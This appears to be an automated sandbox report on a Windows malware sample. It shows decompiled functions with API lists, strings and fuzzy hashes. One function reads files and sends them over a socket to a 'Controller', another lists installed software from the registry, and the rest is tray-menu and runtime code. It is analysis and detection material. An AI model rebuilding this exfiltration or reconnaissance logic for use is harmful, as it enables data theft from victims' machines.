                              0x004067a9
                              0x004067b4
                              0x004067bf
                              0x004067c7
                              0x004067cc
                              0x004067ce
                              0x0040684c
                              0x00406852
                              0x0040685b
                              0x00406861
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004067ce
                              0x004065f4
                              0x004065ea
                              0x00000000
                              0x004067d0
                              0x004067d3
                              0x004067d8
                              0x004067db
                              0x004067de
                              0x004067e5
                              0x004067e8
                              0x004067ec
                              0x004067f4
                              0x004067f5
                              0x004067f8
                              0x004067fa
                              0x004067fd
                              0x00406800
                              0x00406803
                              0x00406803
                              0x0040680c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040680e
                              0x0040680e
                              0x0040680e
                              0x00000000
                              0x0040657e
                              0x0040657e
                              0x00406581
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00406581
                              0x0040657c
                              0x004064ad
                              0x004064b6
                              0x004064bb
                              0x004064c2
                              0x004068c2
                              0x004068c4
                              0x004068c9
                              0x004068cb
                              0x004068cb
                              0x004068cb
                              0x00406827
                              0x0040682a
                              0x00406832
                              0x0040683a
                              0x00406847

                              APIs
                                • Part of subcall function 004049D2: connect.WS2_32(?,0046DB88,00000010), ref: 004049ED
                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064A0
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 004064D7
                              • __aulldiv.LIBCMT ref: 00406559
                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 004065C7
                              • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 004065E2
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                                • Part of subcall function 00404DD5: closesocket.WS2_32(?), ref: 00404DDB
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                              • API String ID: 1319223106-2190262076
                              • Opcode ID: 5a23789908aa5a281926455435f61879a48f65eda8f6a275c427b5af12834781
                              • Instruction ID: 084dee6794f9bc5a8996b457c444aa73e5b6539c698c474e9a2b46c6d08c787a
                              • Opcode Fuzzy Hash: 5a23789908aa5a281926455435f61879a48f65eda8f6a275c427b5af12834781
                              • Instruction Fuzzy Hash: 9AC16871E00219ABCB04FF65DC829EEB775AF44304F5081BFE406B6291EF385A458B99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004187B2, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E004187B2(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x46beb8 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x46bec0);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x46bebc) == 0) {
							ShowWindow( *0x46bebc, 9);
							SetForegroundWindow( *0x46bebc);
						} else {
							ShowWindow( *0x46bebc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x46beb8, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}








                              0x004187ba
                              0x004187bd
                              0x0041888e
                              0x0041889b
                              0x004188a3
                              0x004188a9
                              0x00000000
                              0x004188a9
                              0x004187c3
                              0x004187c8
                              0x00418877
                              0x00000000
                              0x00000000
                              0x00418880
                              0x00418888
                              0x00418888
                              0x004187d3
                              0x004187e3
                              0x004187e8
                              0x00418845
                              0x0041885f
                              0x0041886b
                              0x00418847
                              0x0041884f
                              0x0041884f
                              0x00000000
                              0x00418845
                              0x004187ed
                              0x0041880c
                              0x00418815
                              0x0041882f
                              0x00000000
                              0x0041882f
                              0x004187ef
                              0x004187f2
                              0x004187f5
                              0x004187fa
                              0x00000000
                              0x004187fd
                              0x004187d5
                              0x004187d8
                              0x004187db
                              0x00000000

                              APIs
                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 004187FD
                              • GetCursorPos.USER32(?), ref: 0041880C
                              • SetForegroundWindow.USER32(?), ref: 00418815
                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041882F
                              • Shell_NotifyIconA.SHELL32(00000002,0046BEC0), ref: 00418880
                              • ExitProcess.KERNEL32 ref: 00418888
                              • CreatePopupMenu.USER32 ref: 0041888E
                              • AppendMenuA.USER32 ref: 004188A3
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                              • String ID: Close
                              • API String ID: 1657328048-3535843008
                              • Opcode ID: 34bd8b003ed8040b53161cef1e7b838e0dd6a32a7fd2539b020779d52ba0edc8
                              • Instruction ID: 384e4941bdc51aec785ae54d0846d7427833242b9ed721b5f4b9d7b17cf01d93
                              • Opcode Fuzzy Hash: 34bd8b003ed8040b53161cef1e7b838e0dd6a32a7fd2539b020779d52ba0edc8
                              • Instruction Fuzzy Hash: 28216B31104209BFDB096FA4ED0DAAA7B75FB04342F10413EFA16901B1DBB6DAA0DB59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043E23C, Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E0043E23C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46a00c; // 0x5d382218
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x4577a8;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x457a28;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x457ba8;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E0042F61B(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = L0043DFD9(_t172, 1, 4);
					L0043EE85(_t170);
					_v32 = L0043DFD9(_t172, 0x180, 2);
					L0043EE85(_t170);
					_v36 = L0043DFD9(_t172, 0x180, 1);
					L0043EE85(_t170);
					_v40 = L0043DFD9(_t172, 0x180, 1);
					L0043EE85(_t170);
					_t197 = L0043DFD9(_t172, 0x101, 1);
					_v52 = _t197;
					L0043EE85(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						L0043EE85(_v44);
						L0043EE85(_v32);
						L0043EE85(_v36);
						L0043EE85(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E0044348A(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E0044348A(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = L00447F5C(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										L0043EE85( *(_t215 + 0x90) - 0xfe);
										L0043EE85( *(_t215 + 0x94) - 0x80);
										L0043EE85( *(_t215 + 0x98) - 0x80);
										L0043EE85( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								L0043EE85(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0044A26E(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}



















































                              0x0043e244
                              0x0043e24b
                              0x0043e250
                              0x0043e253
                              0x0043e256
                              0x0043e259
                              0x0043e25c
                              0x0043e262
                              0x0043e265
                              0x0043e268
                              0x0043e26b
                              0x0043e26e
                              0x0043e273
                              0x0043e593
                              0x0043e595
                              0x0043e597
                              0x0043e597
                              0x0043e59a
                              0x0043e5a0
                              0x0043e5a2
                              0x0043e5a8
                              0x0043e5ae
                              0x0043e5b8
                              0x0043e5c2
                              0x0043e5c9
                              0x0043e5d9
                              0x0043e5d9
                              0x0043e279
                              0x0043e27c
                              0x0043e281
                              0x0043e29f
                              0x0043e2a9
                              0x0043e2ac
                              0x0043e2bf
                              0x0043e2c2
                              0x0043e2d0
                              0x0043e2d3
                              0x0043e2e1
                              0x0043e2e4
                              0x0043e2f5
                              0x0043e2f8
                              0x0043e2fb
                              0x0043e300
                              0x0043e306
                              0x0043e55a
                              0x0043e55d
                              0x0043e565
                              0x0043e56d
                              0x0043e575
                              0x0043e57f
                              0x0043e57f
                              0x00000000
                              0x0043e32f
                              0x0043e32f
                              0x0043e331
                              0x0043e331
                              0x0043e334
                              0x0043e335
                              0x0043e34b
                              0x00000000
                              0x00000000
                              0x0043e351
                              0x0043e354
                              0x0043e357
                              0x00000000
                              0x00000000
                              0x0043e364
                              0x0043e367
                              0x0043e36a
                              0x0043e387
                              0x0043e38c
                              0x0043e38f
                              0x0043e391
                              0x00000000
                              0x00000000
                              0x0043e3ab
                              0x0043e3bb
                              0x0043e3c0
                              0x0043e3c5
                              0x00000000
                              0x00000000
                              0x0043e3cf
                              0x0043e3fc
                              0x0043e412
                              0x0043e415
                              0x0043e41a
                              0x0043e41f
                              0x00000000
                              0x00000000
                              0x0043e425
                              0x0043e42a
                              0x0043e430
                              0x0043e433
                              0x0043e436
                              0x0043e439
                              0x0043e43c
                              0x0043e43f
                              0x0043e446
                              0x0043e449
                              0x0043e44c
                              0x0043e44e
                              0x0043e454
                              0x0043e457
                              0x0043e459
                              0x0043e49b
                              0x0043e49d
                              0x0043e4a6
                              0x0043e4ab
                              0x0043e4ae
                              0x0043e4b8
                              0x0043e4ba
                              0x0043e4bd
                              0x0043e4bf
                              0x0043e4c8
                              0x0043e4ca
                              0x0043e4cc
                              0x0043e4cd
                              0x0043e4d8
                              0x0043e4dd
                              0x0043e4e1
                              0x0043e4ef
                              0x0043e502
                              0x0043e510
                              0x0043e51b
                              0x0043e520
                              0x0043e4e1
                              0x0043e523
                              0x0043e526
                              0x0043e52c
                              0x0043e535
                              0x0043e53a
                              0x0043e543
                              0x0043e54c
                              0x0043e555
                              0x0043e580
                              0x0043e583
                              0x00000000
                              0x0043e460
                              0x0043e460
                              0x0043e463
                              0x0043e463
                              0x0043e467
                              0x00000000
                              0x00000000
                              0x0043e469
                              0x0043e472
                              0x0043e490
                              0x0043e490
                              0x0043e496
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043e496
                              0x0043e47a
                              0x0043e47d
                              0x0043e482
                              0x0043e483
                              0x0043e486
                              0x0043e48c
                              0x00000000
                              0x0043e47d
                              0x00000000
                              0x0043e498
                              0x0043e3d6
                              0x0043e3d6
                              0x0043e3d9
                              0x0043e3d9
                              0x0043e3dd
                              0x00000000
                              0x00000000
                              0x0043e3df
                              0x0043e3e3
                              0x0043e3f0
                              0x0043e3e8
                              0x0043e3ec
                              0x0043e3ec
                              0x0043e3ed
                              0x0043e3ed
                              0x0043e3f4
                              0x0043e3f7
                              0x0043e3fa
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043e3fa
                              0x00000000
                              0x0043e3d9
                              0x0043e3cf
                              0x0043e306
                              0x0043e28f
                              0x0043e294
                              0x0043e299
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$Info
                              • String ID:
                              • API String ID: 2509303402-0
                              • Opcode ID: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
                              • Instruction ID: 6b2bdcf8ba42ba7e642015036dc949e4624d86c0fc26f2591f5c67e68ea4a483
                              • Opcode Fuzzy Hash: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
                              • Instruction Fuzzy Hash: 42B19F71901205AEDB11DFAAC881BEEBBF4FF0C304F14516EF855A7282DA79A845CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041755D, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 212registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 63%
                              			E0041755D(void* __ebx, void* __ecx) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v1500;
				void* __edi;
				long _t72;
				long _t78;
				long _t206;
				void* _t207;
				intOrPtr* _t208;

				_t129 = __ebx;
				_t207 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0x400;
					_t206 = 0;
					L00401F4D(__ebx,  &_v64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v1500);
					_push(0);
					while(1) {
						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t72 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							L8:
							_t206 = _t206 + 1;
							__eflags = _t206;
							_v16 = 0x400;
						} else {
							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
							__eflags = _t78;
							if(_t78 == 0) {
								E004103AF( &_v40, _v8, L"DisplayName");
								 *_t208 = L"Publisher";
								E004103AF( &_v184, _v8);
								 *_t208 = L"DisplayVersion";
								E004103AF( &_v160, _v8);
								 *_t208 = L"InstallLocation";
								E004103AF( &_v136, _v8);
								 *_t208 = L"InstallDate";
								E004103AF( &_v112, _v8);
								 *_t208 = L"UninstallString";
								E004103AF( &_v88, _v8);
								__eflags = L00409DB7();
								if(__eflags == 0) {
									E004032F1(E00403086(_t129,  &_v208, E00403086(_t129,  &_v232, E00404409(_t129,  &_v256, E00403086(_t129,  &_v280, E00404409(_t129,  &_v304, E00403086(_t129,  &_v328, E00404409(_t129,  &_v352, E00403086(_t129,  &_v376, E00404409(_t129,  &_v400, E00403086(_t129,  &_v424, E00404409(_t129,  &_v448, E00407516( &_v472,  &_v40, __eflags, 0x4659b4), __eflags,  &_v160), _t206, __eflags, 0x4659b4), __eflags,  &_v112), _t206, __eflags, 0x4659b4), __eflags,  &_v184), _t206, __eflags, 0x4659b4), __eflags,  &_v136), _t206, __eflags, 0x4659b4), __eflags,  &_v88), _t206, __eflags, 0x4659b4), _t206, __eflags, "\n"));
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
								}
								RegCloseKey(_v8);
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00401ED0();
								goto L8;
							}
						}
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v16);
						_push( &_v1500);
						_push(_t206);
					}
					RegCloseKey(_v12);
					E004032FA(_t129, _t207, __eflags,  &_v64);
					L00401ED0();
				} else {
					E0040425F(__ebx, _t207, 0x45f714);
				}
				return _t207;
			}
































                              0x0041755d
                              0x0041757d
                              0x00417587
                              0x0041759d
                              0x004175a4
                              0x004175a6
                              0x004175b0
                              0x004175b1
                              0x004175b2
                              0x004175b3
                              0x004175b4
                              0x004175bb
                              0x004175bc
                              0x00417830
                              0x00417833
                              0x00417839
                              0x0041783e
                              0x00000000
                              0x00000000
                              0x004175c2
                              0x004175c4
                              0x00417816
                              0x00417816
                              0x00417816
                              0x00417817
                              0x004175ca
                              0x004175df
                              0x004175e5
                              0x004175e7
                              0x004175f8
                              0x00417606
                              0x0041760d
                              0x0041761b
                              0x00417622
                              0x00417630
                              0x00417637
                              0x00417642
                              0x00417649
                              0x00417654
                              0x0041765b
                              0x00417669
                              0x0041766b
                              0x0041774b
                              0x00417756
                              0x00417761
                              0x0041776c
                              0x00417777
                              0x00417782
                              0x0041778d
                              0x00417798
                              0x004177a3
                              0x004177ae
                              0x004177b9
                              0x004177c4
                              0x004177cf
                              0x004177cf
                              0x004177d7
                              0x004177e0
                              0x004177e8
                              0x004177f3
                              0x004177fe
                              0x00417809
                              0x00417811
                              0x00000000
                              0x00417811
                              0x004175e7
                              0x0041781e
                              0x00417820
                              0x00417821
                              0x00417822
                              0x00417823
                              0x00417827
                              0x0041782e
                              0x0041782f
                              0x0041782f
                              0x00417847
                              0x00417853
                              0x0041785b
                              0x00417589
                              0x00417590
                              0x00417590
                              0x00417867

                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041757F
                              • RegEnumKeyExA.ADVAPI32 ref: 00417833
                              • RegCloseKey.ADVAPI32(?), ref: 00417847
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseEnumOpen
                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                              • API String ID: 1332880857-3714951968
                              • Opcode ID: 5fe97f1940936f28b5bc2917c3de0c1abf0cc52e137a6ae1b947a500aaf29ee4
                              • Instruction ID: 918c60c30167cdbca0fafa00f68e4c19a9dd40daefd47028054c4c048a220fb3
                              • Opcode Fuzzy Hash: 5fe97f1940936f28b5bc2917c3de0c1abf0cc52e137a6ae1b947a500aaf29ee4
                              • Instruction Fuzzy Hash: B9813F719101089BDB14EB62DC52AEEB379EF54305F1041AFB50AB21D1EF346F85CA69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004480F6, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004480F6(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							L0043EE85(_t46);
							E00447332( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							L0043EE85(_t47);
							E004477EC( *((intOrPtr*)(_t74 + 0x88)));
						}
						L0043EE85( *((intOrPtr*)(_t74 + 0x7c)));
						L0043EE85( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					L0043EE85( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					L0043EE85( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					L0043EE85( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					L0043EE85( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00448269( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							L0043EE85(_t31);
							L0043EE85( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							L0043EE85(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return L0043EE85(_t74);
			}















                              0x004480fe
                              0x00448102
                              0x0044810a
                              0x00448113
                              0x00448118
                              0x0044811f
                              0x00448127
                              0x0044812f
                              0x0044813a
                              0x00448140
                              0x00448141
                              0x00448149
                              0x00448151
                              0x0044815c
                              0x00448162
                              0x00448166
                              0x00448171
                              0x00448177
                              0x00448118
                              0x00448178
                              0x00448180
                              0x00448193
                              0x004481a6
                              0x004481b4
                              0x004481bf
                              0x004481c4
                              0x004481cd
                              0x004481d5
                              0x004481d6
                              0x004481dc
                              0x004481df
                              0x004481e2
                              0x004481e9
                              0x004481eb
                              0x004481ef
                              0x004481f7
                              0x004481fe
                              0x00448204
                              0x00448205
                              0x00448205
                              0x0044820c
                              0x0044820e
                              0x00448213
                              0x0044821b
                              0x00448220
                              0x00448221
                              0x00448221
                              0x00448224
                              0x00448227
                              0x0044822a
                              0x0044822d
                              0x0044822d
                              0x0044823f

                              APIs
                              • ___free_lconv_mon.LIBCMT ref: 0044813A
                                • Part of subcall function 00447332: _free.LIBCMT ref: 0044734F
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447361
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447373
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447385
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447397
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473A9
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473BB
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473CD
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473DF
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473F1
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447403
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447415
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447427
                              • _free.LIBCMT ref: 0044812F
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD
                              • _free.LIBCMT ref: 00448151
                              • _free.LIBCMT ref: 00448166
                              • _free.LIBCMT ref: 00448171
                              • _free.LIBCMT ref: 00448193
                              • _free.LIBCMT ref: 004481A6
                              • _free.LIBCMT ref: 004481B4
                              • _free.LIBCMT ref: 004481BF
                              • _free.LIBCMT ref: 004481F7
                              • _free.LIBCMT ref: 004481FE
                              • _free.LIBCMT ref: 0044821B
                              • _free.LIBCMT ref: 00448233
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                              • String ID:
                              • API String ID: 161543041-0
                              • Opcode ID: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
                              • Instruction ID: a56d3d2c39c59f1f27121bff60bdf2851450fdc6f924b8cf5ee19873ea009e99
